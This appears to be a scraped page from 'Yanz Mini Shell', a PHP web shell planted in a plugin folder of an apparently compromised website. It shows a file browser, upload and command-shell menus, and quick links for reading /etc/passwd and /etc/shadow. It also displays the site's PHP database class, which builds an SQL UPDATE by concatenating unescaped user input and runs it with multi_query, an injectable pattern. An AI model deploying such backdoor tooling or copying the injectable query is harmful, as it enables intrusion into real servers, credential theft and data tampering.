Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
fullcalendar
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php class Database { // Function to update the database function update_db($data, $user = NULL, $code = NULL) { // Connect to the database $mysqli = new mysqli($data['hostname'],$data['username'],$data['password'],$data['database']); // Check for errors if(mysqli_connect_errno()) return false; // Open the default SQL file $query = $data['dbtables']; //update username and code $query .= " UPDATE `tec_settings` SET `envato_username`= '".$user."',`purchase_code`= '".$code."' WHERE setting_id = 1;"; // Execute a multi query $mysqli->multi_query($query); // Close the connection $mysqli->close(); return true; } }
Free Space : 11833925632 Byte